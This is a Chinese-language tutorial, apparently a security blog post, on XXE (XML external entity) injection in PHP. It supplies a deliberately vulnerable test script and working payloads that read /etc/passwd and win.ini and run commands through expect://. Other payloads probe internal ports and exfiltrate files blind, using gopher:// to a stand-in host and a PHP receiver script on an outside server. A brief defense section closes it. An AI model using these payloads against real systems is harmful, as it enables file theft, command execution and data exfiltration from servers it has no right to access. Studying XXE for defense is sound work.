XML實體注入漏洞
測試代碼1:新建xmlget.php,復制下面代碼
<?php $xml=$_GET['xml']; $data = simplexml_load_string($xml); print_r($data); ?>
漏洞測試利用方式1:有回顯,直接讀取文件
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <root> <name>&xxe;</name> </root>
LINUX:
http://192.168.106.154/xml/example1.php?xml=<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE UserInfo[<!ENTITY name SYSTEM "file:///etc/passwd">]><aa>&name;</aa>
讀取passwd文件,需URL編碼后執行。
windows:
http://192.168.106.208/xxe1.php?xml=<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///C:/windows/win.ini" >]> <root> <name>&xxe;</name> </root>
讀取文件、也可以讀取到內容D盤的文件夾,形式如: file:///d:/
URL編碼后可執行:
http://192.168.106.208/xxe1.php?xml=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22utf-8%22%3F%3E%20%0A%3C%21DOCTYPE%20xxe%20%5B%0A%3C%21ELEMENT%20name%20ANY%20%3E%0A%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2f%2f%2fC%3A%2fwindows%2fwin.ini%22%20%3E%5D%3E%0A%3Croot%3E%0A%3Cname%3E%26xxe%3B%3C%2fname%3E%0A%3C%2froot%3E
漏洞測試利用方式2:無回顯,引用遠程服務器上的XML文件讀取文件
將以下1.xml保存到WEB服務器下
1.xml
<!ENTITY % a SYSTEM "file:///etc/passwd"> <!ENTITY % b "<!ENTITY % c SYSTEM 'gopher://xxe.com/%a;'>"> %b; %c
Payload:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.106.208/1.xml"> %remote;]>
http://localhost/ceshi/xmlget.php?xml=<?xml version="1.0"?><!DOCTYPE a [<!ENTITY % d SYSTEM "http://localhost/ceshi/evil.dtd">%d;]><aa>&b;</aa>
evil.dtd文件:<!ENTITY b SYSTEM "file:///F:/linux/1.txt">
漏洞測試利用方式3:
在主機上放一個接收文件的php(get.php):
<?php
file_put_contents('01.txt', $_GET['xxe_local']);
?>
1.xml內容:
<!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd"> <!ENTITY % int "<!ENTITY % trick SYSTEM 'http://192.168.106.208/dede/get.php?id=%payload;'>"> %int; %trick;
Payload:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.106.208/1.xml"> %remote;]>
網站目錄下生成01.txt,將內容進行base64解碼,獲取內容。
測試代碼2:
新建一個xmltest.php,復制下面內容,直接訪問該文件可以讀取file文件內容。
<?php
$xml=<<<EOF <?xml version="1.0" ?> <!DOCTYPE ANY[ <!ENTITY xxe SYSTEM "file:///F:/linux/1.txt"> ]> <x>&xxe;</x> EOF; $data = simplexml_load_string($xml); print_r($data) ?>
讀取任意文件
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <root> <name>&xxe;</name> </root>
執行系統命令
在安裝expect擴展的PHP環境里執行系統命令,其他協議也有可能可以執行系統命令
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "expect://id" >]> <root> <name>&xxe;</name> </root>
探測內網端口
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "http://127.0.0.1:80" >]> <root> <name>&xxe;</name> </root>
攻擊內網網站
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "http://127.0.0.1:80/payload" >]> <root> <name>&xxe;</name> </root>
防御XXE攻擊
方案一、使用開發語言提供的禁用外部實體的方法
PHP:
libxml_disable_entity_loader(true);
JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
Python:
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
方案二、過濾用戶提交的XML數據
關鍵詞:<!DOCTYPE和<!ENTITY,或者,SYSTEM和PUBLIC。
最后
歡迎關注個人微信公眾號:Bypass--,每周一篇原創高質量的干貨。
http://www.secpulse.com/archives/49857.html
http://www.freebuf.com/articles/web/86007.html
參考資料:
未知攻焉知防——XXE漏洞攻防 https://security.tencent.com/index.php/blog/msg/69
XXE漏洞以及Blind XXE總結 http://blog.csdn.net/u011721501/article/details/43775691
XXE注入攻擊與防御 https://www.91ri.org/9539.html